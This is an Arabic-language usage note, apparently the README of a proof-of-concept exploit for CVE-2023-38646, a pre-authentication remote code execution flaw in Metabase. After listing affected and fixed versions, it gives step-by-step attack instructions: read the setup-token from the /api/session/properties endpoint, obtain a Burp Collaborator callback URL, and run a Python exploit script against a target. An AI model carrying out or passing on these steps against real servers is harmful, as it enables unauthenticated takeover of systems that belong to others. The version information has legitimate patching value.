
ثغرة RCE قبل المصادقة في Metabase

تتيح نسخ Metabase مفتوحة المصدر قبل الإصدار 0.46.6.1 وMetabase Enterprise قبل الإصدار 1.46.6.1 للمهاجمين تنفيذ أوامر عشوائية على الخادم بصلاحيات الخادم. لا يتطلب الاستغلال مصادقة. الإصدارات الأخرى التي تم إصلاحها هي 0.45.4.1 و1.45.4.1 و0.44.7.1 و1.44.7.1 و0.43.7.2 و1.43.7.2.
انتقل إلى http://vulnerablehost.com/api/session/properties
حدد "setup-token"

احصل على رابط Collaborator (تم الاختبار باستخدام BurpSuite)
شغّل سكربت إثبات المفهوم باستخدام:
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>